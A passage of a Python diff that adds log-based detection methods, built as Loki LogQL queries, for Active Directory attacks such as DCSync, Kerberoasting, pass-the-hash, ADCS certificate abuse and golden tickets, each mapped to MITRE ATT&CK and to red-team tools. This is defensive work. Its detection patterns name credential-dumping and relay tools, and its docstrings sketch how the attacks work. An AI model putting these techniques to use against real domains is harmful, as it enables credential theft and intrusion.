+        response = await self._query_loki(logql, window_start, window_end, limit=500)
+        response.update(
+            {
+                "_query_template": "share_enumeration",
+                "_mitre_technique": "T1135",
+                "_red_team_tool": "enumerate_shares",
+            }
+        )
+        return response
+
+ # =========================================================================
+ # CREDENTIAL ACCESS (TA0006)
+ # Maps to: secretsdump, kerberoast, asrep_roast, crack_with_hashcat
+ # =========================================================================
+
+    @dn.tool_method  # type: ignore[untyped-decorator]
+    async def detect_secretsdump(
+        self,
+        target_host: str | None = None,
+        hours_back: int = 24,
+    ) -> dict[str, Any]:
+        """Detect credential dumping via impacket-secretsdump.
+
+        Detects red team's secretsdump tool which extracts:
+        - SAM database (local accounts)
+        - LSA secrets
+        - NTDS.dit (domain accounts)
+        - Cached domain credentials
+
+        MITRE ATT&CK: T1003 (OS Credential Dumping)
+        Sub-techniques: T1003.001 (LSASS), T1003.002 (SAM), T1003.003 (NTDS), T1003.004 (LSA)
+
+        Args:
+            target_host: Optional hostname; narrows the stream selector to
+                hostname labels containing this value.
+            hours_back: Hours of logs to search.
+
+        Returns:
+            The Loki response annotated with template, technique,
+            sub-technique and red team tool metadata.
+        """
+        dn.log_metric("query_template_secretsdump", 1, mode="count")
+        start_time, end_time = self._get_time_range(hours_back)
+
+        # DRSUAPI for DCSync, SAMR for SAM dump, registry access for LSA secrets
+        # Event 4624 Type 3 from unusual source, Event 4662 (DS-Replication-Get-Changes)
+        #
+        # The first stage is backtick-quoted on purpose: it contains the regex
+        # escape "\." and a double-quoted LogQL string would treat "\." as an
+        # invalid string escape and fail to parse. Backtick strings are raw.
+        logql = (
+            '{job=~".+"}'
+            " |~ `(?i)(drsuapi|samr|secretsdump|lsadump|ntds\\.dit|sam.*dump)`"
+            ' |~ "(?i)(replicate|1131f6|ds-replication|mimikatz|impacket)"'
+        )
+
+        if target_host:
+            # Swap the selector for a host-scoped one, keeping the filter stages.
+            logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1]
+
+        logger.info(f"Secretsdump detection: {logql}")
+
+        result = await self._query_loki(logql, start_time, end_time, limit=500)
+        result["_query_template"] = "secretsdump"
+        result["_mitre_technique"] = "T1003"
+        result["_mitre_subtechniques"] = ["T1003.001", "T1003.002", "T1003.003", "T1003.004"]
+        result["_red_team_tool"] = "secretsdump"
+
+        return result
+
+    @dn.tool_method  # type: ignore[untyped-decorator]
+    async def detect_dcsync(
+        self,
+        domain_controller: str | None = None,
+        hours_back: int = 24,
+    ) -> dict[str, Any]:
+        """Search logs for a DCSync attack (secretsdump run against a DC).
+
+        With replication rights an attacker can pull every domain credential,
+        including the krbtgt hash that enables golden tickets, so hits are
+        tagged as critical.
+
+        MITRE ATT&CK: T1003.006 (DCSync)
+
+        Args:
+            domain_controller: When given, the stream selector is narrowed to
+                hostname labels containing this value.
+            hours_back: Size of the search window in hours.
+
+        Returns:
+            The Loki response annotated with template, technique, red team
+            tool and severity metadata.
+        """
+        dn.log_metric("query_template_dcsync", 1, mode="count")
+        window_start, window_end = self._get_time_range(hours_back)
+
+        selector = '{job=~".+"}'
+        if domain_controller:
+            selector = f'{{job=~".+", hostname=~".*{domain_controller}.*"}}'
+
+        # Event 4662 carrying the replication GUID prefixes:
+        #   1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 = DS-Replication-Get-Changes
+        #   1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 = DS-Replication-Get-Changes-All
+        logql = " |~ ".join(
+            [
+                selector,
+                '"(?i)(4662|dcsync|ds-replication|1131f6aa|1131f6ad)"',
+                '"(?i)(replication|drsuapi|directory.*service.*access)"',
+            ]
+        )
+
+        logger.info(f"DCSync detection: {logql}")
+
+        response = await self._query_loki(logql, window_start, window_end, limit=500)
+        response.update(
+            {
+                "_query_template": "dcsync",
+                "_mitre_technique": "T1003.006",
+                "_red_team_tool": "secretsdump",
+                "_severity": "critical",
+            }
+        )
+        return response
+
+    @dn.tool_method  # type: ignore[untyped-decorator]
+    async def detect_kerberoasting(
+        self,
+        domain_controller: str | None = None,
+        hours_back: int = 24,
+    ) -> dict[str, Any]:
+        """Search logs for Kerberoasting (impacket-GetUserSPNs).
+
+        Targets the red team's kerberoast tool, which requests TGS tickets for
+        service accounts with SPNs so they can be cracked offline.
+
+        MITRE ATT&CK: T1558.003 (Kerberoasting)
+
+        Args:
+            domain_controller: When given, the stream selector is narrowed to
+                hostname labels containing this value.
+            hours_back: Size of the search window in hours.
+
+        Returns:
+            The Loki response annotated with the template name, technique ID
+            and the red team tool this detection maps to.
+        """
+        dn.log_metric("query_template_kerberoast", 1, mode="count")
+        window_start, window_end = self._get_time_range(hours_back)
+
+        selector = '{job=~".+"}'
+        if domain_controller:
+            selector = f'{{job=~".+", hostname=~".*{domain_controller}.*"}}'
+
+        # Event 4769 (Kerberos service ticket request) combined with SPN and
+        # RC4 (encryption type 0x17) indicators.
+        logql = " |~ ".join(
+            [
+                selector,
+                '"(?i)(4769|kerberos.*ticket|tgs.*request|getuserspn)"',
+                '"(?i)(service.*ticket|spn|rc4|0x17|kerberoast)"',
+            ]
+        )
+
+        logger.info(f"Kerberoasting detection: {logql}")
+
+        response = await self._query_loki(logql, window_start, window_end, limit=500)
+        response.update(
+            {
+                "_query_template": "kerberoasting",
+                "_mitre_technique": "T1558.003",
+                "_red_team_tool": "kerberoast",
+            }
+        )
+        return response
+
+    @dn.tool_method  # type: ignore[untyped-decorator]
+    async def detect_asrep_roasting(
+        self,
+        domain_controller: str | None = None,
+        hours_back: int = 24,
+    ) -> dict[str, Any]:
+        """Search logs for AS-REP Roasting (impacket-GetNPUsers).
+
+        Targets the red team's asrep_roast tool, which goes after accounts
+        that have 'Do not require Kerberos preauthentication' enabled.
+
+        MITRE ATT&CK: T1558.004 (AS-REP Roasting)
+
+        Args:
+            domain_controller: When given, the stream selector is narrowed to
+                hostname labels containing this value.
+            hours_back: Size of the search window in hours.
+
+        Returns:
+            The Loki response annotated with the template name, technique ID
+            and the red team tool this detection maps to.
+        """
+        dn.log_metric("query_template_asrep", 1, mode="count")
+        window_start, window_end = self._get_time_range(hours_back)
+
+        selector = '{job=~".+"}'
+        if domain_controller:
+            selector = f'{{job=~".+", hostname=~".*{domain_controller}.*"}}'
+
+        # Event 4768 (TGT request / AS-REQ) and 4771 (pre-authentication
+        # failed), paired with pre-auth and roasting keywords.
+        logql = " |~ ".join(
+            [
+                selector,
+                '"(?i)(4768|4771|as-req|getnpusers|asrep)"',
+                '"(?i)(pre.*auth|tgt.*request|roast|dont.*require.*preauth)"',
+            ]
+        )
+
+        logger.info(f"AS-REP roasting detection: {logql}")
+
+        response = await self._query_loki(logql, window_start, window_end, limit=500)
+        response.update(
+            {
+                "_query_template": "asrep_roasting",
+                "_mitre_technique": "T1558.004",
+                "_red_team_tool": "asrep_roast",
+            }
+        )
+        return response
+
+    @dn.tool_method  # type: ignore[untyped-decorator]
+    async def detect_brute_force(
+        self,
+        target_host: str | None = None,
+        hours_back: int = 24,
+        threshold: int = 10,
+    ) -> dict[str, Any]:
+        """Detect brute force and password spray attacks.
+
+        Detects credential stuffing attempts from red team's authentication tests.
+        Counts log lines that look like failed authentications and compares the
+        count with ``threshold``.
+
+        MITRE ATT&CK: T1110 (Brute Force), T1110.003 (Password Spraying)
+
+        Args:
+            target_host: Optional hostname; narrows the stream selector to
+                hostname labels containing this value.
+            hours_back: Hours of logs to search.
+            threshold: Minimum failures to flag (default 10).
+
+        Returns:
+            The Loki response with an added ``_analysis`` dict
+            (``total_failures``, ``is_likely_attack``, ``recommendation``,
+            ``query_failed``) plus template and technique metadata. At most
+            1000 entries are requested, so ``total_failures`` is capped there.
+        """
+        dn.log_metric("query_template_brute_force", 1, mode="count")
+        start_time, end_time = self._get_time_range(hours_back)
+
+        # Event 4625: Failed Logon
+        # Event 4771: Kerberos Pre-Auth Failed
+        logql = (
+            '{job=~".+"}'
+            ' |~ "(?i)(4625|4771|failed|invalid|denied)"'
+            ' |~ "(?i)(logon|auth|password|credential)"'
+        )
+
+        if target_host:
+            # Swap the selector for a host-scoped one, keeping the filter stages.
+            logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1]
+
+        logger.info(f"Brute force detection: {logql}")
+
+        result = await self._query_loki(logql, start_time, end_time, limit=1000)
+
+        # Analyze patterns
+        total_failures = self._count_results(result)
+        is_likely_attack = total_failures >= threshold
+        # A failed query yields zero entries; that must not be presented as a
+        # healthy "normal" volume, because nothing was actually measured.
+        query_failed = result.get("status") == "error"
+        if query_failed:
+            recommendation = "Query failed - auth failure volume could not be assessed"
+        elif is_likely_attack:
+            recommendation = "High auth failure volume - investigate source IPs and target accounts"
+        else:
+            recommendation = "Normal failure volume"
+
+        result["_analysis"] = {
+            "total_failures": total_failures,
+            "is_likely_attack": is_likely_attack,
+            "recommendation": recommendation,
+            "query_failed": query_failed,
+        }
+        result["_query_template"] = "brute_force"
+        result["_mitre_technique"] = "T1110"
+
+        return result
+
+ # =========================================================================
+ # LATERAL MOVEMENT (TA0008)
+ # Maps to: domain_admin_checker (pass-the-hash), netexec
+ # =========================================================================
+
+    @dn.tool_method  # type: ignore[untyped-decorator]
+    async def detect_pass_the_hash(
+        self,
+        target_host: str | None = None,
+        hours_back: int = 24,
+    ) -> dict[str, Any]:
+        """Search logs for Pass-the-Hash authentication.
+
+        Targets the red team's domain_admin_checker, which authenticates with
+        NTLM hashes instead of passwords.
+
+        MITRE ATT&CK: T1550.002 (Pass the Hash)
+
+        Args:
+            target_host: When given, the stream selector is narrowed to
+                hostname labels containing this value.
+            hours_back: Size of the search window in hours.
+
+        Returns:
+            The Loki response annotated with the template name, technique ID
+            and the red team tool this detection maps to.
+        """
+        dn.log_metric("query_template_pth", 1, mode="count")
+        window_start, window_end = self._get_time_range(hours_back)
+
+        selector = '{job=~".+"}'
+        if target_host:
+            selector = f'{{job=~".+", hostname=~".*{target_host}.*"}}'
+
+        # Event 4624 with NTLM authentication (NtLmSsp), combined with
+        # network-logon wording or netexec/crackmapexec signatures.
+        logql = " |~ ".join(
+            [
+                selector,
+                '"(?i)(4624|ntlm|ntlmssp|pass.*the.*hash)"',
+                '"(?i)(logon.*type.*3|network.*logon|crackmapexec|netexec)"',
+            ]
+        )
+
+        logger.info(f"Pass-the-Hash detection: {logql}")
+
+        response = await self._query_loki(logql, window_start, window_end, limit=500)
+        response.update(
+            {
+                "_query_template": "pass_the_hash",
+                "_mitre_technique": "T1550.002",
+                "_red_team_tool": "domain_admin_checker",
+            }
+        )
+        return response
+
+    @dn.tool_method  # type: ignore[untyped-decorator]
+    async def detect_lateral_movement(
+        self,
+        source_host: str | None = None,
+        hours_back: int = 24,
+    ) -> dict[str, Any]:
+        """Detect lateral movement patterns.
+
+        Detects various lateral movement techniques used during post-exploitation:
+        - PSExec service creation
+        - WMI execution
+        - WinRM/PowerShell remoting
+        - SMB admin share access
+
+        MITRE ATT&CK: T1021 (Remote Services)
+
+        Args:
+            source_host: Optional source to pivot from; appended as an extra
+                case-insensitive line filter.
+            hours_back: Hours of logs to search.
+
+        Returns:
+            The Loki response annotated with template, technique and
+            sub-technique metadata.
+        """
+        dn.log_metric("query_template_lateral", 1, mode="count")
+        start_time, end_time = self._get_time_range(hours_back)
+
+        # Event 7045: Service installed
+        # Event 4648: Explicit credential logon
+        # Event 4624 Type 3: Network logon
+        #
+        # The second stage is backtick-quoted on purpose: it contains the regex
+        # escape "\$" and a double-quoted LogQL string would treat "\$" as an
+        # invalid string escape and fail to parse. Backtick strings are raw.
+        logql = (
+            '{job=~".+"}'
+            ' |~ "(?i)(7045|4648|psexec|wmic|winrm|powershell.*-session)"'
+            " |~ `(?i)(admin\\$|c\\$|ipc\\$|service.*install|remote.*execution)`"
+        )
+
+        if source_host:
+            logql += f' |~ "(?i){source_host}"'
+
+        logger.info(f"Lateral movement detection: {logql}")
+
+        result = await self._query_loki(logql, start_time, end_time, limit=500)
+        result["_query_template"] = "lateral_movement"
+        result["_mitre_technique"] = "T1021"
+        result["_mitre_subtechniques"] = ["T1021.002", "T1021.003", "T1021.006"]
+
+        return result
+
+    @dn.tool_method  # type: ignore[untyped-decorator]
+    async def detect_smb_file_access(
+        self,
+        target_host: str | None = None,
+        hours_back: int = 24,
+    ) -> dict[str, Any]:
+        """Detect suspicious file access on SMB shares.
+
+        Detects red team's share pilfering tools (enumerate_share_files, download_file_content).
+        Looks for access to sensitive files like scripts, configs, GPP XML.
+
+        MITRE ATT&CK: T1039 (Data from Network Shared Drive)
+
+        Args:
+            target_host: Optional target hostname; narrows the stream selector
+                to hostname labels containing this value.
+            hours_back: Hours of logs to search.
+
+        Returns:
+            The Loki response annotated with template, technique and red team
+            tool metadata.
+        """
+        dn.log_metric("query_template_smb_access", 1, mode="count")
+        start_time, end_time = self._get_time_range(hours_back)
+
+        # Event 5145: Detailed file share access
+        # Look for sensitive file extensions and paths
+        #
+        # The second stage is backtick-quoted on purpose: it contains the regex
+        # escape "\." and a double-quoted LogQL string would treat "\." as an
+        # invalid string escape and fail to parse. Backtick strings are raw.
+        logql = (
+            '{job=~".+"}'
+            ' |~ "(?i)(5145|file.*access|share.*access|smbclient)"'
+            " |~ `(?i)(\\.ps1|\\.bat|\\.cmd|\\.xml|\\.config|sysvol|netlogon|groups\\.xml)`"
+        )
+
+        if target_host:
+            # Swap the selector for a host-scoped one, keeping the filter stages.
+            logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1]
+
+        logger.info(f"SMB file access detection: {logql}")
+
+        result = await self._query_loki(logql, start_time, end_time, limit=500)
+        result["_query_template"] = "smb_file_access"
+        result["_mitre_technique"] = "T1039"
+        result["_red_team_tools"] = ["enumerate_share_files", "download_file_content"]
+
+        return result
+
+ # =========================================================================
+ # PRIVILEGE ESCALATION (TA0004)
+ # Maps to: certipy (ADCS), delegation tools, bloodhound
+ # =========================================================================
+
+    @dn.tool_method  # type: ignore[untyped-decorator]
+    async def detect_adcs_exploitation(
+        self,
+        hours_back: int = 24,
+    ) -> dict[str, Any]:
+        """Search logs for ADCS certificate abuse (ESC1-ESC15).
+
+        Targets the red team's certipy tools, which exploit misconfigured
+        certificate templates. ESC1 is especially dangerous because it allows
+        requesting certificates for any user.
+
+        MITRE ATT&CK: T1649 (Steal or Forge Authentication Certificates)
+
+        Args:
+            hours_back: Size of the search window in hours.
+
+        Returns:
+            The Loki response annotated with template, technique, red team
+            tool and severity metadata.
+        """
+        dn.log_metric("query_template_adcs", 1, mode="count")
+        window_start, window_end = self._get_time_range(hours_back)
+
+        # Event 4886 (certificate request submitted) and 4887 (request
+        # approved), paired with certipy and suspicious-request indicators.
+        logql = " |~ ".join(
+            [
+                '{job=~".+"}',
+                '"(?i)(4886|4887|4876|certipy|certificate.*request)"',
+                '"(?i)(esc[0-9]|enrollee.*supplies.*subject|altname|upn)"',
+            ]
+        )
+
+        logger.info(f"ADCS exploitation detection: {logql}")
+
+        response = await self._query_loki(logql, window_start, window_end, limit=500)
+        response.update(
+            {
+                "_query_template": "adcs_exploitation",
+                "_mitre_technique": "T1649",
+                "_red_team_tools": ["certipy_find", "certipy_req_esc1", "certipy_auth"],
+                "_severity": "high",
+            }
+        )
+        return response
+
+    @dn.tool_method  # type: ignore[untyped-decorator]
+    async def detect_delegation_abuse(
+        self,
+        hours_back: int = 24,
+    ) -> dict[str, Any]:
+        """Search logs for Kerberos delegation attacks.
+
+        Covers the red team's delegation tooling for privilege escalation:
+        - Resource-Based Constrained Delegation (RBCD)
+        - Unconstrained delegation exploitation
+        - S4U2Self/S4U2Proxy abuse
+
+        MITRE ATT&CK: T1134.001 (Token Impersonation/Theft)
+
+        Args:
+            hours_back: Size of the search window in hours.
+
+        Returns:
+            The Loki response annotated with template, technique and red team
+            tool metadata.
+        """
+        dn.log_metric("query_template_delegation", 1, mode="count")
+        window_start, window_end = self._get_time_range(hours_back)
+
+        # msDS-AllowedToActOnBehalfOfOtherIdentity changes, S4U2Self/S4U2Proxy
+        # ticket requests and other delegation attribute modifications.
+        logql = " |~ ".join(
+            [
+                '{job=~".+"}',
+                '"(?i)(delegation|msds-allowedtoactonbehalf|rbcd|s4u2)"',
+                '"(?i)(impersonate|constrained|unconstrained|getst|addcomputer)"',
+            ]
+        )
+
+        logger.info(f"Delegation abuse detection: {logql}")
+
+        response = await self._query_loki(logql, window_start, window_end, limit=500)
+        response.update(
+            {
+                "_query_template": "delegation_abuse",
+                "_mitre_technique": "T1134.001",
+                "_red_team_tools": ["find_delegation", "add_computer", "rbcd_write", "get_st"],
+            }
+        )
+        return response
+
+    @dn.tool_method  # type: ignore[untyped-decorator]
+    async def detect_bloodhound_collection(
+        self,
+        hours_back: int = 24,
+    ) -> dict[str, Any]:
+        """Search logs for BloodHound/SharpHound data collection.
+
+        Targets the red team's BloodHound collection, which maps AD
+        relationships to find privilege escalation paths.
+
+        MITRE ATT&CK: T1087 (Account Discovery), T1069 (Permission Groups
+        Discovery); the result is additionally tagged with T1482.
+
+        Args:
+            hours_back: Size of the search window in hours.
+
+        Returns:
+            The Loki response annotated with the template name, a list of
+            technique IDs under ``_mitre_techniques`` and the red team tool.
+        """
+        dn.log_metric("query_template_bloodhound", 1, mode="count")
+        window_start, window_end = self._get_time_range(hours_back)
+
+        # Collector names and LDAP query wording, paired with the directory
+        # attributes such a collection typically reads.
+        logql = " |~ ".join(
+            [
+                '{job=~".+"}',
+                '"(?i)(bloodhound|sharphound|adexplorer|ldap.*query)"',
+                '"(?i)(acl|objectsid|memberof|primarygroup|msds)"',
+            ]
+        )
+
+        logger.info(f"BloodHound collection detection: {logql}")
+
+        response = await self._query_loki(logql, window_start, window_end, limit=500)
+        response.update(
+            {
+                "_query_template": "bloodhound_collection",
+                "_mitre_techniques": ["T1087", "T1069", "T1482"],
+                "_red_team_tool": "run_bloodhound",
+            }
+        )
+        return response
+
+ # =========================================================================
+ # PERSISTENCE (TA0003)
+ # Maps to: golden_ticket
+ # =========================================================================
+
+    @dn.tool_method  # type: ignore[untyped-decorator]
+    async def detect_golden_ticket(
+        self,
+        hours_back: int = 24,
+    ) -> dict[str, Any]:
+        """Search logs for Golden Ticket creation and usage.
+
+        Targets the red team's golden ticket generation (impacket-ticketer).
+        A golden ticket gives persistent domain admin access through the
+        krbtgt hash, so hits are tagged as critical.
+
+        MITRE ATT&CK: T1558.001 (Golden Ticket)
+
+        Args:
+            hours_back: Size of the search window in hours.
+
+        Returns:
+            The Loki response annotated with template, technique, red team
+            tool and severity metadata.
+        """
+        dn.log_metric("query_template_golden_ticket", 1, mode="count")
+        window_start, window_end = self._get_time_range(hours_back)
+
+        # krbtgt / ticketer references, paired with event 4769 and
+        # forged-ticket wording.
+        logql = " |~ ".join(
+            [
+                '{job=~".+"}',
+                '"(?i)(golden.*ticket|krbtgt|ticketer|krbcred)"',
+                '"(?i)(forged|4769|kerberos.*ticket|enterprise.*admin)"',
+            ]
+        )
+
+        logger.info(f"Golden ticket detection: {logql}")
+
+        response = await self._query_loki(logql, window_start, window_end, limit=500)
+        response.update(
+            {
+                "_query_template": "golden_ticket",
+                "_mitre_technique": "T1558.001",
+                "_red_team_tool": "generate_golden_ticket",
+                "_severity": "critical",
+            }
+        )
+        return response
+
+ # =========================================================================
+ # EXECUTION (TA0002)
+ # Maps to: general command execution patterns
+ # =========================================================================
+
+    @dn.tool_method  # type: ignore[untyped-decorator]
+    async def detect_suspicious_execution(
+        self,
+        target_host: str | None = None,
+        hours_back: int = 24,
+    ) -> dict[str, Any]:
+        """Detect suspicious command execution.
+
+        Detects encoded PowerShell, LOLBins, and script interpreter abuse
+        commonly used during post-exploitation.
+
+        MITRE ATT&CK: T1059 (Command and Scripting Interpreter)
+
+        Args:
+            target_host: Optional hostname; narrows the stream selector to
+                hostname labels containing this value.
+            hours_back: Hours of logs to search.
+
+        Returns:
+            The Loki response annotated with template and technique metadata.
+        """
+        dn.log_metric("query_template_execution", 1, mode="count")
+        start_time, end_time = self._get_time_range(hours_back)
+
+        # Event 4688: Process Creation (with command line logging)
+        #
+        # The first stage is backtick-quoted on purpose: it contains the regex
+        # escape "\." and a double-quoted LogQL string would treat "\." as an
+        # invalid string escape and fail to parse. Backtick strings are raw.
+        logql = (
+            '{job=~".+"}'
+            " |~ `(?i)(4688|powershell|pwsh|cmd\\.exe|wscript|cscript)`"
+            ' |~ "(?i)(encodedcommand|bypass|hidden|downloadstring|invoke)"'
+        )
+
+        if target_host:
+            # Swap the selector for a host-scoped one, keeping the filter stages.
+            logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1]
+
+        logger.info(f"Suspicious execution detection: {logql}")
+
+        result = await self._query_loki(logql, start_time, end_time, limit=500)
+        result["_query_template"] = "suspicious_execution"
+        result["_mitre_technique"] = "T1059"
+
+        return result
+
+ # =========================================================================
+ # ADCS/CERTIPY SPECIFIC DETECTIONS (ESC1-ESC11)
+ # Maps to: certipy_find, certipy_req_esc1, certipy_auth
+ # =========================================================================
+
+    @dn.tool_method  # type: ignore[untyped-decorator]
+    async def detect_certipy_enumeration(
+        self,
+        hours_back: int = 24,
+    ) -> dict[str, Any]:
+        """Search logs for Certipy certificate template enumeration.
+
+        Targets the red team's certipy_find tool, which scans for vulnerable
+        certificate templates as the reconnaissance step before ADCS
+        exploitation.
+
+        MITRE ATT&CK: T1649 (Steal or Forge Authentication Certificates)
+
+        Args:
+            hours_back: Size of the search window in hours.
+
+        Returns:
+            The Loki response annotated with the template name, technique ID
+            and the red team tool this detection maps to.
+        """
+        dn.log_metric("query_template_certipy_enum", 1, mode="count")
+        window_start, window_end = self._get_time_range(hours_back)
+
+        # LDAP traffic (ports 389/636) or certipy itself, paired with PKI
+        # object names such as msPKI-* attributes and certificate templates.
+        logql = " |~ ".join(
+            [
+                '{job=~".+"}',
+                '"(?i)(certipy|ldap|389|636)"',
+                '"(?i)(mspki|pkienrollmentservice|certificatetemplates|pki)"',
+            ]
+        )
+
+        logger.info(f"Certipy enumeration detection: {logql}")
+
+        response = await self._query_loki(logql, window_start, window_end, limit=500)
+        response.update(
+            {
+                "_query_template": "certipy_enumeration",
+                "_mitre_technique": "T1649",
+                "_red_team_tool": "certipy_find",
+            }
+        )
+        return response
+
+    @dn.tool_method  # type: ignore[untyped-decorator]
+    async def detect_esc1_attack(
+        self,
+        hours_back: int = 24,
+    ) -> dict[str, Any]:
+        """Search logs for ESC1 (Enrollee Supplies Subject) abuse.
+
+        ESC1 lets an attacker request certificates with arbitrary Subject
+        Alternative Names (SANs) and so impersonate any user, including
+        Domain Admins. Hits are tagged as critical.
+
+        MITRE ATT&CK: T1649 (Steal or Forge Authentication Certificates)
+
+        Args:
+            hours_back: Size of the search window in hours.
+
+        Returns:
+            The Loki response annotated with template, technique, red team
+            tool, severity and description metadata.
+        """
+        dn.log_metric("query_template_esc1", 1, mode="count")
+        window_start, window_end = self._get_time_range(hours_back)
+
+        # Indicators searched for:
+        # - CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT on the template
+        # - certificate requests carrying a SAN / UPN
+        # - events 4886/4887 (certificate request submitted / approved)
+        logql = " |~ ".join(
+            [
+                '{job=~".+"}',
+                '"(?i)(4886|4887|certificate.*request|certipy)"',
+                '"(?i)(san=|subjectaltname|upn=|enrollee.*supplies|ct_flag)"',
+            ]
+        )
+
+        logger.info(f"ESC1 attack detection: {logql}")
+
+        response = await self._query_loki(logql, window_start, window_end, limit=500)
+        response.update(
+            {
+                "_query_template": "esc1_attack",
+                "_mitre_technique": "T1649",
+                "_red_team_tool": "certipy_req_esc1",
+                "_severity": "critical",
+                "_description": "ESC1: Enrollee supplies subject - allows impersonation",
+            }
+        )
+        return response
+
+    @dn.tool_method  # type: ignore[untyped-decorator]
+    async def detect_esc4_attack(
+        self,
+        hours_back: int = 24,
+    ) -> dict[str, Any]:
+        """Search logs for ESC4 (vulnerable certificate template ACL) abuse.
+
+        ESC4 exploits certificate templates whose ACLs give low-privileged
+        users write access, letting them change the template settings.
+
+        MITRE ATT&CK: T1649 (Steal or Forge Authentication Certificates)
+
+        Args:
+            hours_back: Size of the search window in hours.
+
+        Returns:
+            The Loki response annotated with template, technique, severity
+            and description metadata.
+        """
+        dn.log_metric("query_template_esc4", 1, mode="count")
+        window_start, window_end = self._get_time_range(hours_back)
+
+        # Event 5136 (directory service object modified) or LDAP/template
+        # modification wording, paired with certificate template object names.
+        logql = " |~ ".join(
+            [
+                '{job=~".+"}',
+                '"(?i)(5136|ldap.*modify|template.*modif)"',
+                '"(?i)(pki|certificatetemplate|mspki|enrollmentflag)"',
+            ]
+        )
+
+        logger.info(f"ESC4 attack detection: {logql}")
+
+        response = await self._query_loki(logql, window_start, window_end, limit=500)
+        response.update(
+            {
+                "_query_template": "esc4_attack",
+                "_mitre_technique": "T1649",
+                "_severity": "high",
+                "_description": "ESC4: Certificate template ACL modification",
+            }
+        )
+        return response
+
+    @dn.tool_method  # type: ignore[untyped-decorator]
+    async def detect_esc8_attack(
+        self,
+        hours_back: int = 24,
+    ) -> dict[str, Any]:
+        """Search logs for ESC8 (NTLM relay to AD CS HTTP endpoints).
+
+        ESC8 abuses the AD CS web enrollment endpoints (certsrv): the attacker
+        coerces an authentication and relays it to the CA to request a
+        certificate. Hits are tagged as critical.
+
+        MITRE ATT&CK: T1649 (Steal or Forge Authentication Certificates)
+
+        Args:
+            hours_back: Size of the search window in hours.
+
+        Returns:
+            The Loki response annotated with template, technique, severity
+            and description metadata.
+        """
+        dn.log_metric("query_template_esc8", 1, mode="count")
+        window_start, window_end = self._get_time_range(hours_back)
+
+        # Indicators searched for:
+        # - HTTP requests to /certsrv/certfnsh.asp and related endpoints
+        # - NTLM relay tooling
+        # - PetitPotam / PrinterBug / DFSCoerce coercion
+        logql = " |~ ".join(
+            [
+                '{job=~".+"}',
+                '"(?i)(certsrv|certfnsh|certenroll|ntlmrelayx)"',
+                '"(?i)(relay|coerce|petitpotam|printerbug|dfscoerce)"',
+            ]
+        )
+
+        logger.info(f"ESC8 attack detection: {logql}")
+
+        response = await self._query_loki(logql, window_start, window_end, limit=500)
+        response.update(
+            {
+                "_query_template": "esc8_attack",
+                "_mitre_technique": "T1649",
+                "_severity": "critical",
+                "_description": "ESC8: NTLM relay to AD CS web enrollment",
+            }
+        )
+        return response
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_certificate_authentication(
+ self,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect authentication using stolen/forged certificates.
+
+ Detects red team's certipy_auth using certificates for PKINIT auth
+ to obtain TGTs and NTLM hashes.
+
+ MITRE ATT&CK: T1649 (Steal or Forge Authentication Certificates)
+
+ Args:
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with cert auth indicators.
+ """
+ dn.log_metric("query_template_cert_auth", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # PKINIT authentication, certificate-based Kerberos
+ # Event 4768 with certificate auth
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(pkinit|pkca|smartcard|certificate.*auth)"'
+ ' |~ "(?i)(4768|tgt.*request|kerberos|certipy.*auth)"'
+ )
+
+ logger.info(f"Certificate authentication detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "certificate_authentication"
+ result["_mitre_technique"] = "T1649"
+ result["_red_team_tool"] = "certipy_auth"
+
+ return result
+
+ # =========================================================================
+ # BLOODHOUND SPECIFIC LDAP QUERY SIGNATURES
+ # Maps to: run_bloodhound
+ # =========================================================================
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_bloodhound_domain_enum(
+ self,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect BloodHound domain trust and forest enumeration.
+
+ BloodHound queries for cross-domain trust relationships and forest
+ topology to map potential attack paths.
+
+ MITRE ATT&CK: T1482 (Domain Trust Discovery)
+
+ Args:
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with domain enum indicators.
+ """
+ dn.log_metric("query_template_bh_domain", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # BloodHound domain enumeration LDAP queries:
+ # - trusteddomain objectclass queries
+ # - crossRef objects for forest structure
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(ldap|389|636|bloodhound|sharphound)"'
+ ' |~ "(?i)(trusteddomain|crossref|trusttype|trustdirection|trustattributes)"'
+ )
+
+ logger.info(f"BloodHound domain enumeration detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "bloodhound_domain_enum"
+ result["_mitre_technique"] = "T1482"
+ result["_red_team_tool"] = "run_bloodhound"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_bloodhound_acl_enum(
+ self,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect BloodHound ACL/DACL enumeration.
+
+ BloodHound's ACL collection queries for nTSecurityDescriptor on AD
+ objects to find privilege escalation paths via ACL abuse.
+
+ MITRE ATT&CK: T1069.002 (Permission Groups Discovery: Domain Groups)
+
+ Args:
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with ACL enumeration indicators.
+ """
+ dn.log_metric("query_template_bh_acl", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # BloodHound ACL collection LDAP patterns:
+ # - nTSecurityDescriptor attribute requests
+ # - Large LDAP queries for DACL
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(ldap|389|636|bloodhound|sharphound)"'
+ ' |~ "(?i)(ntsecuritydescriptor|dacl|securitydescriptor|allowedtoactonbehalf)"'
+ )
+
+ logger.info(f"BloodHound ACL enumeration detection: {logql}")
